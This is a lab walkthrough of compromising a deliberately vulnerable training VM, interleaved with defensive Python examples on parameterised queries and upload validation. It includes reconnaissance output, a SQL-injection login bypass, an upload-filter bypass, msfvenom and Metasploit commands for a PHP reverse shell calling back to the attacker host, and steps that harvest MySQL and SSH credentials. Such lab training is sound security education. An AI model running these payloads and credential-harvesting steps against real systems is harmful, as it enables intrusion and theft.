Privilege escalation on a penetration-testing target VM
1 Gather information about the target
nmap -sV 192.168.222.131
***
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT
Nmap scan report for localhost (192.168.222.131)
Host is up (0.000067s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:97:47:75 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds
***
nmap -A -v -T4 192.168.222.131
***
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:11 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating ARP Ping Scan at 03:11
Scanning 192.168.222.131 [1 port]
Completed ARP Ping Scan at 03:11, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:11
Completed Parallel DNS resolution of 1 host. at 03:11, 0.00s elapsed
Initiating SYN Stealth Scan at 03:11
Scanning localhost (192.168.222.131) [1000 ports]
Discovered open port 80/tcp on 192.168.222.131
Discovered open port 21/tcp on 192.168.222.131
Discovered open port 22/tcp on 192.168.222.131
Completed SYN Stealth Scan at 03:11, 0.12s elapsed (1000 total ports)
Initiating Service scan at 03:11
Scanning 3 services on localhost (192.168.222.131)
Completed Service scan at 03:11, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against localhost (192.168.222.131)
NSE: Script scanning 192.168.222.131.
Initiating NSE at 03:11
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 03:11, 3.51s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Nmap scan report for localhost (192.168.222.131)
Host is up (0.00014s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.222.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 00:0C:29:97:47:75 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.249 days (since Tue Oct 19 21:13:36 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.14 ms localhost (192.168.222.131)

NSE: Script Post-scanning.
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
***
2. Port 80 is open, so scan its web directories
dirb http://192.168.222.131
***
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Oct 20 03:21:34 2021
URL_BASE: http://192.168.222.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.222.131/ ----
==> DIRECTORY: http://192.168.222.131/assets/
+ http://192.168.222.131/index.php (CODE:200|SIZE:758)
==> DIRECTORY: http://192.168.222.131/javascript/
+ http://192.168.222.131/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.222.131/uploads/

---- Entering directory: http://192.168.222.131/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.131/javascript/ ----
==> DIRECTORY: http://192.168.222.131/javascript/jquery/

---- Entering directory: http://192.168.222.131/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.131/javascript/jquery/ ----
+ http://192.168.222.131/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.222.131/javascript/jquery/version (CODE:200|SIZE:5)

-----------------
END_TIME: Wed Oct 20 03:21:42 2021
DOWNLOADED: 13836 - FOUND: 4
***
nikto -host IP:PORT (the port can be omitted when it is 80)
nikto -host 192.168.222.131
***
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.222.131
+ Target Hostname:    192.168.222.131
+ Target Port:        80
+ Start Time:         2021-10-20 03:25:17 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.   # PHP config file; it holds the SQL account and password
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-10-20 03:26:10 (GMT-4) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
***
2. Log in through the target's login page
The page reads the submitted username into the variable user and the password into pwd. str is the substring of user that starts one character past the last @ in the username and runs to the end of user.
Notice the check pwd == " ' ": if the password is exactly a single quote, the page shows a "hacker intrusion" message. That points to SQL injection, so use fuzzing to test whether the login is injectable.
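The single-quote check described above is a blocklist on one exact string, not a defence. The following added example (not code from the original page; the target's real PHP is not shown there, and the users table, its columns and the sample row are constructed) contrasts the string-spliced query pattern that such a check tries to patch over with the parameterised form, and shows that a password such as `x'` slips past the quote check yet still reaches the spliced SQL. It uses SQLite standing in for the target's MySQL; the domain_part helper mirrors the str substring the page describes, with Python's rfind semantics.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the target's `user` table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (username TEXT, password TEXT)")
    db.execute("INSERT INTO user VALUES ('alice@example.com', 'correct-horse')")
    return db


def domain_part(user):
    """The `str` value the page describes: everything after the last '@' in the username.
    With Python's rfind, a name without '@' yields the whole string."""
    return user[user.rfind("@") + 1:]


def naive_quote_check(pwd):
    """The check the page describes: only a password that is exactly one single quote is flagged."""
    return pwd == "'"


def login_concatenated(db, user, pwd):
    """Vulnerable pattern: user input is spliced into the SQL text itself."""
    sql = "SELECT username FROM user WHERE username = '%s' AND password = '%s'" % (user, pwd)
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, user, pwd):
    """Hardened pattern: values are bound as parameters and never parsed as SQL."""
    sql = "SELECT username FROM user WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pwd)).fetchone() is not None


def probe(db, user, pwd):
    """Run one credential pair through the quote check and both query styles.
    A syntax error from the spliced query is reported as a string instead of raising."""
    result = {"blocked_by_quote_check": naive_quote_check(pwd)}
    try:
        result["concatenated"] = login_concatenated(db, user, pwd)
    except sqlite3.Error:
        result["concatenated"] = "sql-syntax-error"
    result["parameterized"] = login_parameterized(db, user, pwd)
    return result


if __name__ == "__main__":
    db = make_db()
    for pwd in ("correct-horse", "'", "x'"):
        print(repr(pwd), probe(db, "alice@example.com", pwd))
```

The parameterised version never errors and never treats the password as SQL, so the quote check becomes unnecessary; the spliced version errors on `'` (which is what the page's "hacker" message is reacting to) and just as readily on `x'`, which the quote check does not catch.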
Bypassing the login authentication
Web fuzzing wordlists are located at /usr/share/wordlists/wfuzz
Brute-force with Burp
The brute-force run turns up some SQL-injection passwords
Open the Burp result link
http://burp/show/2/z04tysv5yakgkqk89wm5h4owdubpursu
3. This is a file upload page
It will not accept PHP files
It only accepts jpg; the page restricts what can be uploaded
Capture the request and modify it so that PHP is uploaded
Create a reverse shell with msf:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php
(lhost is the attacking machine, lport the listening port, and the redirect target is the output path and file name.) Edit the shell and remove the comment marker.
Rename shell.php to shell.jpg # to get past the validation. Then capture the request in Burp Suite and modify it to bypass the check; the upload succeeds.
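The upload check described above looks only at the file name (and, via the Burp edit, apparently at client-supplied request fields), which is why renaming shell.php to shell.jpg gets through. The following added example (not code from the original page or the target application; the signature table, marker list and sample byte strings are constructed) shows the server-side validation a defender would want instead: an extension allowlist, a magic-byte check against the bytes actually received, a scan for embedded PHP tags, and a random server-chosen storage name so the client name is never used on disk.

```python
import os
import secrets

# Allowed extensions and the leading bytes a genuine file of that type must start with.
# Constructed table for this example; extend it for the formats a site really needs.
ALLOWED_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}

# Opening tags that must never appear anywhere in an "image", including in metadata fields.
PHP_MARKERS = (b"<?php", b"<?=")


def validate_upload(filename, content):
    """Decide on the bytes received, never on the client name or Content-Type alone.
    Returns (accepted, reason)."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_SIGNATURES:
        return False, "extension not allowed"
    if not any(content.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        return False, "content does not match image signature"
    if any(marker in content.lower() for marker in PHP_MARKERS):
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(filename):
    """Server-chosen on-disk name: random hex plus the validated extension.
    The client-supplied base name is discarded entirely."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


def handle_upload(filename, content):
    """Combine the checks; returns (accepted, reason, on_disk_name_or_None)."""
    ok, reason = validate_upload(filename, content)
    return ok, reason, (stored_name(filename) if ok else None)


if __name__ == "__main__":
    # Constructed samples: a renamed script, a real JPEG header, and a JPEG with a tag in it.
    samples = {
        "shell.php": b"<?php echo 1; ?>",
        "shell.jpg": b"<?php echo 1; ?>",
        "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
        "photo-with-tag.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00<?PHP echo 1; ?>",
    }
    for name, data in samples.items():
        print(name, handle_upload(name, data))
```

Two things the code cannot do on its own still matter: keep the upload directory outside the web root (or, under Apache, disable PHP execution there with a per-directory `php_admin_flag engine off`) so that even a file that slips through the checks is served as data rather than run, and turn off the directory listing that dirb reported on /uploads/.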
Catching the reverse shell by listening on a port
1. Listen with msf
msfconsole                                 // start msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp    // set the payload
set lhost 192.168.222.128                  // IP the shell connects back to
set lport 4444                             // port the shell connects back to
Open the payload page in the browser
The reverse shell connects back
sysinfo                                    // show system information
Read the config.php file; it reveals the MySQL account and password.
mysql -u root -p                           // log in to mysql
show databases;                            // list databases; fails, insufficient privileges
python -c "import pty;pty.spawn('/bin/bash')"   // python's pty module spawns a native terminal in one line
Use the native terminal to log in to mysql and inspect its contents:
mysql -u root -p
Enter password: toor
show databases;                            // list the current databases
use deneme;                                // switch to the deneme database
select * from user;                        // dump the table
This reveals usernames and passwords; log in with ssh.